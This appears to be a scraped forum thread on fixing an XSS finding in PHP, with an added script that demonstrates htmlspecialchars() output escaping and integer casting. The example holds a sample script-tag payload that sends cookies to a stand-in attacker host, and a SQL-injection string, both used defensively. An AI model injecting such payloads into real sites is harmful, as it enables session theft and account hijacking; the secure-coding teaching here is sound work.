The system has a severe vulnerability: how to filter user input metadata?
Source: Internet
Author: User
When I checked my website:
The system has severe vulnerabilities,
Vulnerability level: High risk
Threat type: Cross Site Scripting
Possible consequences: malicious users can exploit vulnerabilities in JavaScript, VBScript, ActiveX, HTML, and even Flash to obtain other users' information. Attackers can steal session cookies, hijack accounts, impersonate other users, and even modify the content the webpage presents to other users.
Description: This page is vulnerable to XSS attacks.
Cross-site scripting (XSS) is generally written in JavaScript and allows an attacker to send malicious code to another user. Because the browser cannot tell whether the script is trustworthy, the injected script runs and lets the attacker obtain other users' cookies or sessions.
Suggestion: We recommend that you filter user input metadata.
What does that mean? Does anyone know how to filter it?
------ Solution --------------------
addslashes() escapes incoming data to prevent SQL injection. If magic_quotes_gpc is on, you do not need to escape it again in the program.
htmlspecialchars() is for data output, for example user comments, where you cannot know what the user has submitted; that is the vulnerability you mentioned above.
In that case, htmlspecialchars() is required on the data output to the page.
------ Solution --------------------
e.g. addslashes($_POST['username'])
Sometimes you need to check the type of $str or $id.
If the checking is poor, you will still be compromised even if you use addslashes() and then htmlspecialchars() on top of it.
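Added example (mine, not code from either reply above) that puts the two replies together: addslashes() on the comment, to show that it leaves the script tag intact and so does nothing against XSS; htmlspecialchars() with ENT_QUOTES at output time, for both the element body and an attribute value; and an (int) cast for the id, which is the "determine the type" point from the second reply. The form fields, the sample payload and the h() helper are assumptions made up for the example, and $_POST is simulated inline so the script runs from the command line without a web server.

```php
<?php
// Added example, not from the thread: escaping user-supplied data for HTML
// output with htmlspecialchars(), and typing numeric input.
declare(strict_types=1);

// Constructed sample input standing in for $_POST (assumption: a comment form
// with a numeric id, a username and a free-text comment).
$post = [
    'id'       => '42 OR 1=1',
    'username' => "O'Brien",
    'comment'  => '<script>document.location="http://evil.example/?c="+document.cookie</script>',
];

// Wrong tool for XSS: addslashes() only backslash-escapes quotes, backslashes
// and NUL. The <script> tag survives untouched, so this string still executes
// in the browser if it is echoed into the page.
$slashed = addslashes($post['comment']);
echo "addslashes only:  $slashed\n";

// Right tool for HTML text: htmlspecialchars() turns < > & " ' into entities,
// so the browser renders the payload as text instead of running it.
// h() is an assumed helper name, not a PHP built-in.
function h(string $s): string
{
    return htmlspecialchars($s, ENT_QUOTES | ENT_HTML5, 'UTF-8');
}

// Numeric parameters: decide the type instead of escaping. The (int) cast
// yields 42 and discards the trailing " OR 1=1"; use the cast value, never
// the raw string, in queries and in the page.
$id = (int) $post['id'];

// Quoted attribute values need ENT_QUOTES (the default since PHP 8.1) so a "
// in the input cannot close the attribute and append onmouseover=... to it.
$html = sprintf(
    '<div class="comment" data-id="%d" data-user="%s">%s</div>',
    $id,
    h($post['username']),
    h($post['comment'])
);
echo "escaped output:   $html\n";
```

Run it with php from the command line and compare the two printed lines: the first still contains a live <script> element, the second contains only &lt;script&gt;. Store the raw submission and escape at output time, as the first reply says, because the correct escaping depends on where the value ends up (element text and attribute values are shown here; a value inserted into JavaScript or a URL needs a different encoder). Two caveats beyond the thread: magic_quotes_gpc was removed in PHP 5.4, so no code should rely on it, and on the SQL side prepared statements (PDO or mysqli) are the usual replacement for addslashes().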